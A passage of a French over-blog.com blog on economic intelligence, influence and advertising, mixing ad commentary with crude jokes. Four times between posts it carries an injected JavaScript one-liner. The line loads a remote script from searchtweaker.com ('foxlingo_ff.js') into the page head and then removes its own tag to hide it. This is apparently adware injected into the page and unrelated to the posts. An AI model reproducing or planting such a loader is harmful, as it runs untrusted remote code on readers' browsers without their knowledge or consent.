Vendredi 16 octobre 5 16 /10 /Oct 15:06

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Par Photslink - Publié dans : Influence
Ecrire un commentaire - Voir les 0 commentaires
Vendredi 3 juillet 5 03 /07 /Juil 23:09
Histoire Vraie... 

Comment appeler la police quand vous êtes vieux et que vous n' êtes plus très mobile.. 
 
Georges PHILLIPS, un homme d' un certain âge vivant à VANCOUVER au Canada allait se coucher quand sa femme lui dit qu' il avait laissé la lumière dans l' abri de jardin qu' elle pouvait voir depuis la fenêtre de la chambre. Georges ouvrit la porte arrière pour éteindre, mais il vit qu' il y avait des personnes dans l' abri en train de voler du matériel. 
 
Il appela la police qui lui demanda : "quelqu'un s' est-il introduit chez vous ?" il répondit "non, mais des gens sont en train de me voler après s' être introduits dans ma cabane de jardin " 
 
La police répondit: "toutes nos patrouilles sont occupées il faut vous enfermer , et un officier passera dès qu' il sera libre. Georges dit " O.K " puis il raccrocha, et attendit 30 secondes et rappela la police. 
 
"Bonjour, je viens de vous appeler pour des voleurs dans mon abri de jardin... Ne vous inquiétez plus à ce propos... je les ai tués " Puis il raccrocha. 
 
  Dans les cinq minutes 6 voitures de police une équipe de tireurs un hélicoptère deux camions de pompiers une ambulance et le samu local se présentèrent devant son domicile, et les voleurs furent pris en flagrant délit. 
 
Un policier lui dit " je croyais que vous les aviez tués..." 
Georges répondit " Je croy ais que vous m' aviez dit que vous n' aviez personne de disponible ..." 
 
Histoire vraie..
Moralité : faut pas Emmerder les Vieux.
Par Photslink - Publié dans : Influence
Ecrire un commentaire - Voir les 0 commentaires
Vendredi 3 octobre 5 03 /10 /Oct 21:23

Les méthodes d'influence se situent aux frontières de celles de la publicité...

Dans l'image publicitaire ci-dessous, publiée par BMW pour ses voitures d'occasion, le message est quasiment faux mais la pression sur l'acheteur est forte...  Il s'agit donc d'une manipulation, pas d'une action d'influence, au sens strict du terme.

Traduction : "vous savez que vous n'êtes pas le premier..."

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Par Photslink - Publié dans : Influence
Ecrire un commentaire - Voir les 0 commentaires
Samedi 31 mai 6 31 /05 /Mai 22:58
Prévoir son coup, en anticipant les réactions des interlocuteurs, augmente les chances de réussite...  Mais dans le cas relaté dans la blague ci-dessous, comme on dit en franglais c'est du "one-shot" !

Un homme arrive chez Cartier, Place Vendôme à Paris, en compagnie d'une jeune femme splendide, et ensemble, ils choisissent un bijou de 50 000 euros pour elle.
Au moment de payer, l'homme sort son carnet de chèques et, sans sourciller, le rédige.
Le vendeur, lui, est un peu ennuyé car c'est la première fois qu'il voit ce couple à la bijouterie.
L'homme s'aperçoit du malaise du vendeur et, avec beaucoup d'aplomb, lui dit:
- J'ai le sentiment, très cher, que vous pensez que ce chèque est peut-être sans provision, n'est-ce pas ?...
- Heu... Et bien...
- Bien !voici ce que nous allons faire : vu qu'aujourd'hui c'est samedi et que ma banque est fermée, je vous propose que vous gardiez ce chèque ainsi que le bijou. Dès lundi, procédez à son encaissement et lorsque le paiement sera honoré, faites livrer le bijou chez Mademoiselle. D'accord ?...
Le vendeur, rassuré, donne son aval à cette solution sans l'ombre d'une hésitation, assurant même, que la bijouterie prendrait à sa charge la livraison du bijou et qu'il s'assurerait en personne du bon déroulement de l'opération.
Le lundi matin, à la présentation du chèque à la banque, celui-ci est bien évidemment en bois !!!
En colère, le vendeur appelle le client qui lui répond :
- Mais ce n'est pas grave ! Cela ne vous a rien coûté et moi j'ai baisé tout le week-end !!!... Merci beaucoup pour votre collaboration et sans rancune !
Par Photslink - Publié dans : Sources humaines
Ecrire un commentaire - Voir les 0 commentaires
Samedi 31 mai 6 31 /05 /Mai 18:13
Lieu commun : Internet est un vecteur puissant d'informations.
Mais on ne trouve pas tout sur Internet : on trouve de tout.
Alors...
"Restez concentrés, focalisez-vous sur le sujet"...  Ces conseils sont utiles pour éviter de se disperser !  Et dans le cadre d'une recherche automatisée sur Internet, cette délimitation préliminaire est indispensable pour obtenir une collecte de qualité.

La limite naturelle de cette démarche est bien connue : on ne trouve que ce que l'on cherche.  Ainsi, si on recherche de l'information sur les spaghettis, il semble normal de ne pas recueillir d'informations sur la composition chimique de l'atmosphère de Neptune par exemple...  tout simplement parce qu'il n'y a pas de lien direct et évident.

Dans le domaine de la recherche scientifique, le fait de rappeler que les chercheurs ne trouvent que ce qu'ils cherchent peut surprendre, a priori.  Pourtant c'est bien pareil !  Et cette préconception naïve ne résiste pas à l'examen de la réalité.  C'est une question de sociologie des chercheurs, domaine bien expliqué notamment par
Bruno Latour.

Être attentif à tous les signaux que nous recevons n'est pas possible, donc.  Il faut filtrer, trier, classer puis agir en fonction, ceci pourrait définir la démarche d'intelligence stratégique.

Maintenant, un dirigeant d'entreprise doit être alerté sur des signaux provenant de son environnement plus large que celui défini par sa veille concurrentielle.  Il faut en complément indispensable à la veille concurrentielle une veille sociétale, politique...  Sinon, d'autres acteurs (pas les concurrents, mais des associations de consommateurs par exemple) verront une information différente de celle perçue à travers le filtre d'une veille technologique trop pointue, parce qu'ils ne regarderont pas sous le même angle de recherche la même information.  Sachant que la veille technologique peut être assurée par les études et développement, la veille sociétale par le marketing etc., il apparaît que la synthèse de ces veilles doit être effectuée à un niveau proche du décideur final.  Car le dirigeant n'est spécialiste de rien !  et doit répondre à tout.

Illustration des éléments théoriques avancés ci-dessus : un conducteur dirige sa voiture mais ne doit pas resté focalisé sur un environnement constitué de panneaux de circulation et de véhicules uniquement, cela ne suffit pas.  Une
publicité pour les cyclistes aux USA joue sur cela.


Comme il s'agit de changer le comportement des conducteurs, la communication publicitaire joue sur le tableau de la nécessité d'avoir simultanément tous les points de vue : le point de vue de celui qui est attentif à l'environnement habituel et en même temps d'autres points de vue...
Chaque conducteur est assimilé au décideur, celui qui dirige : et, comme Napoléon l'a dit : "Se faire battre est excusable, se faire surprendre est impardonnable"...
Par Photslink
Ecrire un commentaire - Voir les 0 commentaires
Samedi 31 mai 6 31 /05 /Mai 17:56

L'information, sang de la guerre (puisque le nerf est l'argent...), est souvent "disponible" chez les personnes.  Pour obtenir les informations souhaitées, il est optimal de rencontrer les personnes adéquates en se présentant sous son meilleur jour.
Cependant, parfois on ne peut pas préparer la rencontre.  Aors, en observant l'environnement et après un auto-conditionnement mental express, la première rencontre peut se passer au mieux et au moins laisser la porte ouverte pour d'autres rencontres, puisqu'il est intéressant d'établir une relation durable.

Une publicité d'Heineken  montre une technique de préparation mentale express, utilisée pour une première rencontre, en jouant un rôle de composition

Par Photslink - Publié dans : Sources humaines
Ecrire un commentaire - Voir les 0 commentaires
Mercredi 21 mai 3 21 /05 /Mai 22:43
La locution "intelligence économique" contient le mot "économique".  Il est vrai qu'il faut s'intéresser au marché, ce qui est le métier du marketing.  D'où ce rappel sur le vocabulaire fondamental du marketing...

Original trouvé sur (mais site disparu) : http://www.informaticiennes.com/humour/20020420/20020420.php3

  1. Tu es à une soirée et tu vois une nana très attirante. Tu t'approches d'elle et tu lui dis : “Je suis un très bon coup”. Ça c'est du Marketing Direct.
  2. Tu es à une soirée avec un groupe de copains et vous voyez une nana très attirante. Un de tes amis s'approche d'elle et lui dit : “Tu vois ce garçon là bas, c'est un très bon coup”. Ça c'est de la Publicité.
  3. Tu es à une soirée et tu vois une nana très attirante. Tu lui demandes son numéro de téléphone. Le lendemain, tu l'appelles et tu lui dis: ” Je suis un très bon coup”. Ça c'est du Télémarketing.
  4. Tu es à une soirée et tu vois une nana très attirante. Tu la reconnais. Tu t'approches d'elle, tu lui rafraîchis la mémoire et tu lui dis : “Tu te souviens que je suis un très bon coup ?”. Ça c'est du Customer Relationship Management.
  5. Tu es à une soirée et tu vois une nana très attirante. Tu te lèves, tu arranges un peu tes vêtements, tu t'approches d'elle et tu lui sers un verre. Tu lui ouvres la porte lorsqu'elle part, tu ramasses son sac lorsqu'il tombe. Tu lui offre une cigarette et tu lui dis : “Je suis un très bon coup”. Ça c'est des Relations Publiques.
  6. Tu es à une soirée et tu vois une nana très attirante. Elle s'approche de toi et te dit : “J'ai entendu dire que tu es un très bon coup”. Ça c'est du Branding, le pouvoir de la marque !
  7. Tu es à une soirée et tu vois une super belle nana. Tu la mates avec des potes, tu fais des réflexions très fines, tu te bourres la gueule, tu ne fais rien du tout et tu rentres bredouille. Ça, c'est la réalité du marché.
Par Photslink - Publié dans : Vocabulaire
Ecrire un commentaire - Voir les 0 commentaires
Mercredi 21 mai 3 21 /05 /Mai 22:16

La “femme-objet” représente l'instrumentalisation de l'image de la femme au service d'un objet, d'un service : les féministes des années 70 ont combattu ardemment cette instrumentalisation.

Cependant les publicitaires des années 2000 continuent à exploiter cette veine, même si c'est au second degré (autrement dit il est évident que la bimbo qui pose à côté de la cafetière ou sur la plage du pays à visiter n'est là qu'en tant que faire-valoir, sa position est souvent exagérée, même pour de la publicité).

Dans ce contexte de femme-objet, mais cette fois-ci la femme étant carrément l'objet à atteindre, et sachant que les intelligents de l'économie sont un peu chasseurs dans l'âme, le spot publicitaire d'Interflora nous cueille dans sa ligne de mire…


Par Photslink - Publié dans : Sources humaines
Ecrire un commentaire - Voir les 0 commentaires
Mercredi 21 mai 3 21 /05 /Mai 22:12

L'influence, ce n'est pas du chantage… Ainsi une demande d'augmentation de salaire, formulée comme dans l'image,

 

l-augmentationsalaire.jpg

 

n'est pas vraiment une action d'influence.  En fait, dans ce cas, je conseille quand même de se faire aimer un peu par son patron, ça peut aider.

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Par Photslink - Publié dans : Influence
Ecrire un commentaire - Voir les 0 commentaires
Dimanche 18 mai 7 18 /05 /Mai 22:34

En utilisant cette définition réduite, l'influence est une des techniques permettant de mettre en action l'intelligence économique.
La publicité a une frontière floue avec l'influence : elle a aussi pour mission de convaincre sa cible d'adapter son comportement, en faveur du produit vendu.
Un bel exemple de ceci est illustré dans une publicité pour une école de karaté.

Influence-dissuasion-kung-fu.jpg

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Par Photslink - Publié dans : Influence
Ecrire un commentaire - Voir les 0 commentaires
Créer un blog gratuit sur over-blog.com - Contact - C.G.U. - Rémunération en droits d'auteur - Signaler un abus